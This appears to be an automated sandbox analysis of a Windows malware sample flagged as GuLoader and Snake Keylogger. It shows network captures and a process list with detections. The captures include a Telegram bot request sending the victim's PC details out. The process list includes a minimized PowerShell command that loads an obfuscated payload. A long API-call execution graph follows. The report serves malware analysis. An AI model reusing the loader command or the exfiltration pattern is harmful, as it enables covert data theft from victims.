Date: Wed, 08 Jan 2025 15:21:34 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1664483
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B04g3PfjYz8xie3G9rOKDbNIVYjyKnft6AJHuY9rcTKg4w%2B9yIix2h3bz%2B5nPnjYxRmsDkafiLUnNcu%2BxNOYItNfFqBS7ZouEHoru%2FuArp7dtoJ0rJlyL1JAgKdhMe0JOFzAcaJ7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fed2d962fc6f78d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1494&rtt_var=592&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1801357&cwnd=125&unsent_bytes=0&cid=1c106ad3f68ea58a&ts=156&x=0"
2025-01-08 15:21:34 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 10 | Source IP: 192.168.2.8 | Source Port: 49727 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 3504 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-08 15:21:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-08 15:21:36 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Wed, 08 Jan 2025 15:21:36 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1664485
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I5FU0zT2FRwagSTuKhKNOKGbsr0%2FDrFdFzI%2BQjyVnlw4HNT0N2H3A%2FKTpVEK6pLY%2FXds71ppqw3lqY9ExBYWnMk9GiQCaEIhP4dgqicCKTieaGdUG4eewP3Tu%2BbtuJEsFCq9V%2Fw8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fed2da02f1d422d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1660&rtt_var=644&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1671436&cwnd=232&unsent_bytes=0&cid=614319a04a809769&ts=156&x=0"
2025-01-08 15:21:36 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 11 | Source IP: 192.168.2.8 | Source Port: 49728 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 3504 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-08 15:21:36 UTC | 345 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2009/01/2025%20/%2000:44:31%0D%0ACountry%20Name:%20United%20States%0D%0A[%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-08 15:21:36 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Wed, 08 Jan 2025 15:21:36 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-08 15:21:36 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Target ID: 0
Start time: 10:20:02
Start date: 08/01/2025
Path: C:\Users\user\Desktop\HVSU7GbA5N.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\HVSU7GbA5N.exe"
Imagebase: 0x400000
File size: 650'314 bytes
MD5 hash: 9EEAA6C9CE625021AC21B5EB40FB73E7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 10:20:03
Start date: 08/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)"
Imagebase: 0xe20000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2032574742.000000000A644000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 3
Start time: 10:20:03
Start date: 08/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 10:21:05
Start date: 08/01/2025
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0x2d0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.2665789154.0000000023071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Execution Graph

Execution Coverage: 20.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 22.9%
Total number of Nodes: 1244
Total number of Limit Nodes: 39
402e62 37 API calls 3940->3941 3945 40270b 3941->3945 3943 402757 3942->3943 3943->3931 3944 402729 GlobalFree 3944->3939 3945->3944 3946->3928 3947->3936 3948 401705 3949 4029fd 18 API calls 3948->3949 3950 40170c SearchPathA 3949->3950 3951 401727 3950->3951 3952 403f87 lstrcpynA lstrlenA 3134 40218a 3135 4029fd 18 API calls 3134->3135 3136 402190 3135->3136 3137 4029fd 18 API calls 3136->3137 3138 402199 3137->3138 3139 4029fd 18 API calls 3138->3139 3140 4021a2 3139->3140 3149 405ec1 FindFirstFileA 3140->3149 3143 4021bc lstrlenA lstrlenA 3146 404ea6 25 API calls 3143->3146 3144 4021af 3145 404ea6 25 API calls 3144->3145 3148 4021b7 3144->3148 3145->3148 3147 4021f8 SHFileOperationA 3146->3147 3147->3144 3147->3148 3150 4021ab 3149->3150 3151 405ed7 FindClose 3149->3151 3150->3143 3150->3144 3151->3150 3953 40280a 3954 4029e0 18 API calls 3953->3954 3955 402810 3954->3955 3956 402841 3955->3956 3957 40281e 3955->3957 3958 402663 3955->3958 3956->3958 3959 405bdf 18 API calls 3956->3959 3957->3958 3961 405b1b wsprintfA 3957->3961 3959->3958 3961->3958 3969 40220c 3970 402213 3969->3970 3973 402226 3969->3973 3971 405bdf 18 API calls 3970->3971 3972 402220 3971->3972 3974 4053d1 MessageBoxIndirectA 3972->3974 3974->3973 3975 401490 3976 404ea6 25 API calls 3975->3976 3977 401497 3976->3977 3152 401b11 3153 401b62 3152->3153 3154 401b1e 3152->3154 3155 401b66 3153->3155 3156 401b8b GlobalAlloc 3153->3156 3157 401ba6 3154->3157 3160 401b35 3154->3160 3167 402226 3155->3167 3173 405bbd lstrcpynA 3155->3173 3158 405bdf 18 API calls 3156->3158 3159 405bdf 18 API calls 3157->3159 3157->3167 3158->3157 3162 402220 3159->3162 3171 405bbd lstrcpynA 3160->3171 3174 4053d1 3162->3174 3164 401b78 GlobalFree 3164->3167 3166 401b44 3172 405bbd lstrcpynA 3166->3172 3169 401b53 3178 405bbd lstrcpynA 3169->3178 3171->3166 3172->3169 3173->3164 3175 4053e6 3174->3175 3176 4053fa MessageBoxIndirectA 3175->3176 3177 405432 3175->3177 3176->3177 3177->3167 3178->3167 3228 401595 3229 
4029fd 18 API calls 3228->3229 3230 40159c SetFileAttributesA 3229->3230 3231 4015ae 3230->3231 3978 401c95 3979 4029e0 18 API calls 3978->3979 3980 401c9c 3979->3980 3981 4029e0 18 API calls 3980->3981 3982 401ca4 GetDlgItem 3981->3982 3983 4024cb 3982->3983 3984 406197 3990 40601b 3984->3990 3985 406986 3986 4060a5 GlobalAlloc 3986->3985 3986->3990 3987 40609c GlobalFree 3987->3986 3988 406113 GlobalFree 3989 40611c GlobalAlloc 3988->3989 3989->3985 3989->3990 3990->3985 3990->3986 3990->3987 3990->3988 3990->3989 3997 402519 3998 4029e0 18 API calls 3997->3998 4002 402523 3998->4002 3999 40258d 4000 4058c6 ReadFile 4000->4002 4001 40258f 4006 405b1b wsprintfA 4001->4006 4002->3999 4002->4000 4002->4001 4003 40259f 4002->4003 4003->3999 4005 4025b5 SetFilePointer 4003->4005 4005->3999 4006->3999 4007 404e1a 4008 404e2a 4007->4008 4009 404e3e 4007->4009 4010 404e30 4008->4010 4011 404e87 4008->4011 4012 404e46 IsWindowVisible 4009->4012 4018 404e5d 4009->4018 4014 403ebf SendMessageA 4010->4014 4013 404e8c CallWindowProcA 4011->4013 4012->4011 4015 404e53 4012->4015 4016 404e3a 4013->4016 4014->4016 4020 404771 SendMessageA 4015->4020 4018->4013 4025 4047f1 4018->4025 4021 4047d0 SendMessageA 4020->4021 4022 404794 GetMessagePos ScreenToClient SendMessageA 4020->4022 4023 4047c8 4021->4023 4022->4023 4024 4047cd 4022->4024 4023->4018 4024->4021 4034 405bbd lstrcpynA 4025->4034 4027 404804 4035 405b1b wsprintfA 4027->4035 4029 40480e 4030 40140b 2 API calls 4029->4030 4031 404817 4030->4031 4036 405bbd lstrcpynA 4031->4036 4033 40481e 4033->4011 4034->4027 4035->4029 4036->4033 3637 40231c 3638 402322 3637->3638 3639 4029fd 18 API calls 3638->3639 3640 402334 3639->3640 3641 4029fd 18 API calls 3640->3641 3642 40233e RegCreateKeyExA 3641->3642 3643 402892 3642->3643 3644 402368 3642->3644 3645 402380 3644->3645 3646 4029fd 18 API calls 3644->3646 3647 40238c 3645->3647 3649 4029e0 18 API calls 3645->3649 3648 402379 lstrlenA 3646->3648 3650 4023a7 RegSetValueExA 
3647->3650 3651 402e62 37 API calls 3647->3651 3648->3645 3649->3647 3652 4023bd RegCloseKey 3650->3652 3651->3650 3652->3643 4037 40261c 4038 40261f 4037->4038 4042 402637 4037->4042 4039 40262c FindNextFileA 4038->4039 4040 402676 4039->4040 4039->4042 4043 405bbd lstrcpynA 4040->4043 4043->4042 2899 4039a0 2900 403af3 2899->2900 2901 4039b8 2899->2901 2903 403b44 2900->2903 2904 403b04 GetDlgItem GetDlgItem 2900->2904 2901->2900 2902 4039c4 2901->2902 2905 4039e2 2902->2905 2906 4039cf SetWindowPos 2902->2906 2908 403b9e 2903->2908 2913 401389 2 API calls 2903->2913 2907 403e73 19 API calls 2904->2907 2910 4039e7 ShowWindow 2905->2910 2911 4039ff 2905->2911 2906->2905 2912 403b2e SetClassLongA 2907->2912 2914 403aee 2908->2914 2969 403ebf 2908->2969 2910->2911 2915 403a21 2911->2915 2916 403a07 DestroyWindow 2911->2916 2917 40140b 2 API calls 2912->2917 2918 403b76 2913->2918 2920 403a26 SetWindowLongA 2915->2920 2921 403a37 2915->2921 2919 403dfc 2916->2919 2917->2903 2918->2908 2922 403b7a SendMessageA 2918->2922 2919->2914 2930 403e2d ShowWindow 2919->2930 2920->2914 2925 403ae0 2921->2925 2926 403a43 GetDlgItem 2921->2926 2922->2914 2923 40140b 2 API calls 2940 403bb0 2923->2940 2924 403dfe DestroyWindow EndDialog 2924->2919 3006 403eda 2925->3006 2927 403a73 2926->2927 2928 403a56 SendMessageA IsWindowEnabled 2926->2928 2932 403a80 2927->2932 2933 403ac7 SendMessageA 2927->2933 2934 403a93 2927->2934 2944 403a78 2927->2944 2928->2914 2928->2927 2930->2914 2932->2933 2932->2944 2933->2925 2937 403ab0 2934->2937 2938 403a9b 2934->2938 2936 403e73 19 API calls 2936->2940 2941 40140b 2 API calls 2937->2941 3000 40140b 2938->3000 2939 403aae 2939->2925 2940->2914 2940->2923 2940->2924 2940->2936 2960 403d3e DestroyWindow 2940->2960 2972 405bdf 2940->2972 2990 403e73 2940->2990 2943 403ab7 2941->2943 2943->2925 2943->2944 3003 403e4c 2944->3003 2946 403c2b GetDlgItem 2947 403c40 2946->2947 2948 403c48 ShowWindow KiUserCallbackDispatcher 2946->2948 2947->2948 2993 
403e95 KiUserCallbackDispatcher 2948->2993 2950 403c72 EnableWindow 2953 403c86 2950->2953 2951 403c8b GetSystemMenu EnableMenuItem SendMessageA 2952 403cbb SendMessageA 2951->2952 2951->2953 2952->2953 2953->2951 2994 403ea8 SendMessageA 2953->2994 2995 405bbd lstrcpynA 2953->2995 2956 403ce9 lstrlenA 2957 405bdf 18 API calls 2956->2957 2958 403cfa SetWindowTextA 2957->2958 2996 401389 2958->2996 2960->2919 2961 403d58 CreateDialogParamA 2960->2961 2961->2919 2962 403d8b 2961->2962 2963 403e73 19 API calls 2962->2963 2964 403d96 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2963->2964 2965 401389 2 API calls 2964->2965 2966 403ddc 2965->2966 2966->2914 2967 403de4 ShowWindow 2966->2967 2968 403ebf SendMessageA 2967->2968 2968->2919 2970 403ed7 2969->2970 2971 403ec8 SendMessageA 2969->2971 2970->2940 2971->2970 2973 405bec 2972->2973 2974 405e0f 2973->2974 2977 405c8d GetVersion 2973->2977 2978 405de6 lstrlenA 2973->2978 2979 405bdf 10 API calls 2973->2979 2982 405d05 GetSystemDirectoryA 2973->2982 2984 405d18 GetWindowsDirectoryA 2973->2984 2986 405bdf 10 API calls 2973->2986 2987 405d8f lstrcatA 2973->2987 2988 405d4c SHGetSpecialFolderLocation 2973->2988 3020 405aa4 RegOpenKeyExA 2973->3020 3025 405e28 2973->3025 3034 405b1b wsprintfA 2973->3034 3035 405bbd lstrcpynA 2973->3035 2975 405e24 2974->2975 3036 405bbd lstrcpynA 2974->3036 2975->2940 2977->2973 2978->2973 2979->2978 2982->2973 2984->2973 2986->2973 2987->2973 2988->2973 2989 405d64 SHGetPathFromIDListA CoTaskMemFree 2988->2989 2989->2973 2991 405bdf 18 API calls 2990->2991 2992 403e7e SetDlgItemTextA 2991->2992 2992->2946 2993->2950 2994->2953 2995->2956 2998 401390 2996->2998 2997 4013fe 2997->2940 2998->2997 2999 4013cb MulDiv SendMessageA 2998->2999 2999->2998 3001 401389 2 API calls 3000->3001 3002 401420 3001->3002 3002->2944 3004 403e53 3003->3004 3005 403e59 SendMessageA 3003->3005 3004->3005 3005->2939 3007 403ef2 GetWindowLongA 3006->3007 3017 403f7b 3006->3017 3008 403f03 3007->3008 
3007->3017 3009 403f12 GetSysColor 3008->3009 3010 403f15 3008->3010 3009->3010 3011 403f25 SetBkMode 3010->3011 3012 403f1b SetTextColor 3010->3012 3013 403f43 3011->3013 3014 403f3d GetSysColor 3011->3014 3012->3011 3015 403f54 3013->3015 3016 403f4a SetBkColor 3013->3016 3014->3013 3015->3017 3018 403f67 DeleteObject 3015->3018 3019 403f6e CreateBrushIndirect 3015->3019 3016->3015 3017->2914 3018->3019 3019->3017 3021 405b15 3020->3021 3022 405ad7 RegQueryValueExA 3020->3022 3021->2973 3023 405af8 RegCloseKey 3022->3023 3023->3021 3026 405e34 3025->3026 3028 405e9c 3026->3028 3029 405e91 CharNextA 3026->3029 3032 405e7f CharNextA 3026->3032 3033 405e8c CharNextA 3026->3033 3037 405678 3026->3037 3027 405ea0 CharPrevA 3027->3028 3028->3027 3030 405ebb 3028->3030 3029->3026 3029->3028 3030->2973 3032->3026 3033->3029 3034->2973 3035->2973 3036->2975 3038 40567e 3037->3038 3039 405691 3038->3039 3040 405684 CharNextA 3038->3040 3039->3026 3040->3038 4051 4016a1 4052 4029fd 18 API calls 4051->4052 4053 4016a7 GetFullPathNameA 4052->4053 4054 4016be 4053->4054 4060 4016df 4053->4060 4057 405ec1 2 API calls 4054->4057 4054->4060 4055 402892 4056 4016f3 GetShortPathNameA 4056->4055 4058 4016cf 4057->4058 4058->4060 4061 405bbd lstrcpynA 4058->4061 4060->4055 4060->4056 4061->4060 4062 404823 GetDlgItem GetDlgItem 4063 404875 7 API calls 4062->4063 4066 404a8d 4062->4066 4064 404918 DeleteObject 4063->4064 4065 40490b SendMessageA 4063->4065 4067 404921 4064->4067 4065->4064 4079 404771 5 API calls 4066->4079 4083 404b71 4066->4083 4096 404afe 4066->4096 4068 404958 4067->4068 4069 405bdf 18 API calls 4067->4069 4070 403e73 19 API calls 4068->4070 4072 40493a SendMessageA SendMessageA 4069->4072 4075 40496c 4070->4075 4071 404c1d 4073 404c27 SendMessageA 4071->4073 4074 404c2f 4071->4074 4072->4067 4073->4074 4084 404c41 ImageList_Destroy 4074->4084 4085 404c48 4074->4085 4093 404c58 4074->4093 4080 403e73 19 API calls 4075->4080 4076 404a80 4077 403eda 8 API calls 
4076->4077 4082 404e13 4077->4082 4078 404b63 SendMessageA 4078->4083 4079->4096 4097 40497a 4080->4097 4081 404bca SendMessageA 4081->4076 4087 404bdf SendMessageA 4081->4087 4083->4071 4083->4076 4083->4081 4084->4085 4088 404c51 GlobalFree 4085->4088 4085->4093 4086 404dc7 4086->4076 4091 404dd9 ShowWindow GetDlgItem ShowWindow 4086->4091 4090 404bf2 4087->4090 4088->4093 4089 404a4e GetWindowLongA SetWindowLongA 4092 404a67 4089->4092 4098 404c03 SendMessageA 4090->4098 4091->4076 4094 404a85 4092->4094 4095 404a6d ShowWindow 4092->4095 4093->4086 4105 4047f1 4 API calls 4093->4105 4109 404c93 4093->4109 4114 403ea8 SendMessageA 4094->4114 4113 403ea8 SendMessageA 4095->4113 4096->4078 4096->4083 4097->4089 4099 404a48 4097->4099 4102 4049c9 SendMessageA 4097->4102 4103 404a05 SendMessageA 4097->4103 4104 404a16 SendMessageA 4097->4104 4098->4071 4099->4089 4099->4092 4102->4097 4103->4097 4104->4097 4105->4109 4106 404d9d InvalidateRect 4106->4086 4107 404db3 4106->4107 4115 40472c 4107->4115 4108 404cc1 SendMessageA 4112 404cd7 4108->4112 4109->4108 4109->4112 4111 404d4b SendMessageA SendMessageA 4111->4112 4112->4106 4112->4111 4113->4076 4114->4066 4118 404667 4115->4118 4117 404741 4117->4086 4119 40467d 4118->4119 4120 405bdf 18 API calls 4119->4120 4121 4046e1 4120->4121 4122 405bdf 18 API calls 4121->4122 4123 4046ec 4122->4123 4124 405bdf 18 API calls 4123->4124 4125 404702 lstrlenA wsprintfA SetDlgItemTextA 4124->4125 4125->4117 4126 401d26 GetDC GetDeviceCaps 4127 4029e0 18 API calls 4126->4127 4128 401d44 MulDiv ReleaseDC 4127->4128 4129 4029e0 18 API calls 4128->4129 4130 401d63 4129->4130 4131 405bdf 18 API calls 4130->4131 4132 401d9c CreateFontIndirectA 4131->4132 4133 4024cb 4132->4133 4134 40172c 4135 4029fd 18 API calls 4134->4135 4136 401733 4135->4136 4137 40587d 2 API calls 4136->4137 4138 40173a 4137->4138 4138->4138 4139 401dac 4140 4029e0 18 API calls 4139->4140 4141 401db2 4140->4141 4142 4029e0 18 API calls 4141->4142 4143 401dbb 
4142->4143 4144 401dc2 ShowWindow 4143->4144 4145 401dcd EnableWindow 4143->4145 4146 402892 4144->4146 4145->4146 4147 401eac 4148 4029fd 18 API calls 4147->4148 4149 401eb3 4148->4149 4150 405ec1 2 API calls 4149->4150 4151 401eb9 4150->4151 4153 401ecb 4151->4153 4154 405b1b wsprintfA 4151->4154 4154->4153 4155 40192d 4156 4029fd 18 API calls 4155->4156 4157 401934 lstrlenA 4156->4157 4158 4024cb 4157->4158 4159 4024af 4160 4029fd 18 API calls 4159->4160 4161 4024b6 4160->4161 4164 40584e GetFileAttributesA CreateFileA 4161->4164 4163 4024c2 4164->4163 4165 401cb0 4166 4029e0 18 API calls 4165->4166 4167 401cc0 SetWindowLongA 4166->4167 4168 402892 4167->4168 4169 401a31 4170 4029e0 18 API calls 4169->4170 4171 401a37 4170->4171 4172 4029e0 18 API calls 4171->4172 4173 4019e1 4172->4173 4174 4042b1 4175 4042dd 4174->4175 4176 4042ee 4174->4176 4235 4053b5 GetDlgItemTextA 4175->4235 4178 4042fa GetDlgItem 4176->4178 4181 404359 4176->4181 4180 40430e 4178->4180 4179 4042e8 4182 405e28 5 API calls 4179->4182 4184 404322 SetWindowTextA 4180->4184 4189 4056e6 4 API calls 4180->4189 4185 405bdf 18 API calls 4181->4185 4196 40443d 4181->4196 4233 4045e6 4181->4233 4182->4176 4187 403e73 19 API calls 4184->4187 4190 4043cd SHBrowseForFolderA 4185->4190 4186 40446d 4191 40573b 18 API calls 4186->4191 4192 40433e 4187->4192 4188 403eda 8 API calls 4193 4045fa 4188->4193 4194 404318 4189->4194 4195 4043e5 CoTaskMemFree 4190->4195 4190->4196 4197 404473 4191->4197 4198 403e73 19 API calls 4192->4198 4194->4184 4201 40564d 3 API calls 4194->4201 4199 40564d 3 API calls 4195->4199 4196->4233 4237 4053b5 GetDlgItemTextA 4196->4237 4238 405bbd lstrcpynA 4197->4238 4200 40434c 4198->4200 4202 4043f2 4199->4202 4236 403ea8 SendMessageA 4200->4236 4201->4184 4205 404429 SetDlgItemTextA 4202->4205 4210 405bdf 18 API calls 4202->4210 4205->4196 4206 404352 4208 405ee8 3 API calls 4206->4208 4207 40448a 4209 405ee8 3 API calls 4207->4209 4208->4181 4217 404492 4209->4217 4211 404411 
lstrcmpiA 4210->4211 4211->4205 4214 404422 lstrcatA 4211->4214 4212 4044cc 4239 405bbd lstrcpynA 4212->4239 4214->4205 4215 4044d5 4216 4056e6 4 API calls 4215->4216 4218 4044db GetDiskFreeSpaceA 4216->4218 4217->4212 4220 405694 2 API calls 4217->4220 4222 404524 4217->4222 4221 4044fd MulDiv 4218->4221 4218->4222 4220->4217 4221->4222 4223 404595 4222->4223 4224 40472c 21 API calls 4222->4224 4225 4045b8 4223->4225 4227 40140b 2 API calls 4223->4227 4226 404582 4224->4226 4240 403e95 KiUserCallbackDispatcher 4225->4240 4229 404597 SetDlgItemTextA 4226->4229 4230 404587 4226->4230 4227->4225 4229->4223 4232 404667 21 API calls 4230->4232 4231 4045d4 4231->4233 4241 404246 4231->4241 4232->4223 4233->4188 4235->4179 4236->4206 4237->4186 4238->4207 4239->4215 4240->4231 4242 404254 4241->4242 4243 404259 SendMessageA 4241->4243 4242->4243 4243->4233 3179 401e32 3180 4029fd 18 API calls 3179->3180 3181 401e38 3180->3181 3182 404ea6 25 API calls 3181->3182 3183 401e42 3182->3183 3195 40536c CreateProcessA 3183->3195 3185 401e9e CloseHandle 3189 402663 3185->3189 3186 401e67 WaitForSingleObject 3187 401e48 3186->3187 3188 401e75 GetExitCodeProcess 3186->3188 3187->3185 3187->3186 3187->3189 3198 405f21 3187->3198 3191 401e92 3188->3191 3192 401e87 3188->3192 3191->3185 3194 401e90 3191->3194 3202 405b1b wsprintfA 3192->3202 3194->3185 3196 4053ab 3195->3196 3197 40539f CloseHandle 3195->3197 3196->3187 3197->3196 3199 405f3e PeekMessageA 3198->3199 3200 405f34 DispatchMessageA 3199->3200 3201 405f4e 3199->3201 3200->3199 3201->3186 3202->3194 3203 4015b3 3204 4029fd 18 API calls 3203->3204 3205 4015ba 3204->3205 3221 4056e6 CharNextA CharNextA 3205->3221 3207 40160a 3209 401638 3207->3209 3210 40160f 3207->3210 3208 405678 CharNextA 3211 4015d0 CreateDirectoryA 3208->3211 3215 401423 25 API calls 3209->3215 3212 401423 25 API calls 3210->3212 3213 4015c2 3211->3213 3214 4015e5 GetLastError 3211->3214 3216 401616 3212->3216 3213->3207 3213->3208 3214->3213 3217 4015f2 
GetFileAttributesA 3214->3217 3220 401630 3215->3220 3227 405bbd lstrcpynA 3216->3227 3217->3213 3219 401621 SetCurrentDirectoryA 3219->3220 3222 405701 3221->3222 3225 405711 3221->3225 3224 40570c CharNextA 3222->3224 3222->3225 3223 405731 3223->3213 3224->3223 3225->3223 3226 405678 CharNextA 3225->3226 3226->3225 3227->3219 3232 4030b6 #17 SetErrorMode OleInitialize 3307 405ee8 GetModuleHandleA 3232->3307 3236 403126 GetCommandLineA 3312 405bbd lstrcpynA 3236->3312 3238 403138 GetModuleHandleA 3239 40314f 3238->3239 3240 405678 CharNextA 3239->3240 3241 403163 CharNextA 3240->3241 3246 403173 3241->3246 3242 40323d 3243 403250 GetTempPathA 3242->3243 3313 403082 3243->3313 3245 403268 3247 4032c2 DeleteFileA 3245->3247 3248 40326c GetWindowsDirectoryA lstrcatA 3245->3248 3246->3242 3249 405678 CharNextA 3246->3249 3253 40323f 3246->3253 3321 402c29 GetTickCount GetModuleFileNameA 3247->3321 3250 403082 11 API calls 3248->3250 3249->3246 3252 403288 3250->3252 3252->3247 3257 40328c GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3252->3257 3403 405bbd lstrcpynA 3253->3403 3254 4032d6 3255 40336c 3254->3255 3258 40335c 3254->3258 3262 405678 CharNextA 3254->3262 3420 403534 3255->3420 3260 403082 11 API calls 3257->3260 3349 40360e 3258->3349 3264 4032ba 3260->3264 3265 4032f1 3262->3265 3264->3247 3264->3255 3271 403337 3265->3271 3272 40339b lstrcatA lstrcmpiA 3265->3272 3266 403385 3269 4053d1 MessageBoxIndirectA 3266->3269 3267 403479 3268 40351c ExitProcess 3267->3268 3270 405ee8 3 API calls 3267->3270 3273 403393 ExitProcess 3269->3273 3275 40348c 3270->3275 3404 40573b 3271->3404 3272->3255 3277 4033b7 CreateDirectoryA SetCurrentDirectoryA 3272->3277 3278 405ee8 3 API calls 3275->3278 3280 4033d9 3277->3280 3281 4033ce 3277->3281 3282 403495 3278->3282 3428 405bbd lstrcpynA 3280->3428 3427 405bbd lstrcpynA 3281->3427 3285 405ee8 3 API calls 3282->3285 3287 40349e 3285->3287 3290 4034bc 3287->3290 3296 4034ac GetCurrentProcess 
3287->3296 3288 403351 3419 405bbd lstrcpynA 3288->3419 3289 405bdf 18 API calls 3292 403418 DeleteFileA 3289->3292 3293 405ee8 3 API calls 3290->3293 3294 403425 CopyFileA 3292->3294 3304 4033e7 3292->3304 3295 4034f3 3293->3295 3294->3304 3297 403508 ExitWindowsEx 3295->3297 3300 403515 3295->3300 3296->3290 3297->3268 3297->3300 3298 40346d 3301 405a71 40 API calls 3298->3301 3302 40140b 2 API calls 3300->3302 3301->3255 3302->3268 3303 405bdf 18 API calls 3303->3304 3304->3289 3304->3298 3304->3303 3305 40536c 2 API calls 3304->3305 3306 403459 CloseHandle 3304->3306 3429 405a71 3304->3429 3305->3304 3306->3304 3308 405f04 LoadLibraryA 3307->3308 3309 405f0f GetProcAddress 3307->3309 3308->3309 3310 4030fb SHGetFileInfoA 3308->3310 3309->3310 3311 405bbd lstrcpynA 3310->3311 3311->3236 3312->3238 3314 405e28 5 API calls 3313->3314 3315 40308e 3314->3315 3316 403098 3315->3316 3434 40564d lstrlenA CharPrevA 3315->3434 3316->3245 3441 40584e GetFileAttributesA CreateFileA 3321->3441 3323 402c69 3341 402c79 3323->3341 3442 405bbd lstrcpynA 3323->3442 3325 402c8f 3443 405694 lstrlenA 3325->3443 3329 402ca0 GetFileSize 3330 402d9c 3329->3330 3343 402cb7 3329->3343 3448 402bc5 3330->3448 3332 402da5 3334 402dd5 GlobalAlloc 3332->3334 3332->3341 3485 40306b SetFilePointer 3332->3485 3459 40306b SetFilePointer 3334->3459 3336 402e08 3338 402bc5 6 API calls 3336->3338 3338->3341 3339 402dbe 3342 403055 ReadFile 3339->3342 3340 402df0 3460 402e62 3340->3460 3341->3254 3345 402dc9 3342->3345 3343->3330 3343->3336 3343->3341 3346 402bc5 6 API calls 3343->3346 3482 403055 3343->3482 3345->3334 3345->3341 3346->3343 3347 402dfc 3347->3341 3347->3347 3348 402e39 SetFilePointer 3347->3348 3348->3341 3350 405ee8 3 API calls 3349->3350 3351 403622 3350->3351 3352 403628 3351->3352 3353 40363a 3351->3353 3505 405b1b wsprintfA 3352->3505 3354 405aa4 3 API calls 3353->3354 3355 403665 3354->3355 3357 403683 lstrcatA 3355->3357 3358 405aa4 3 API calls 3355->3358 3359 403638 
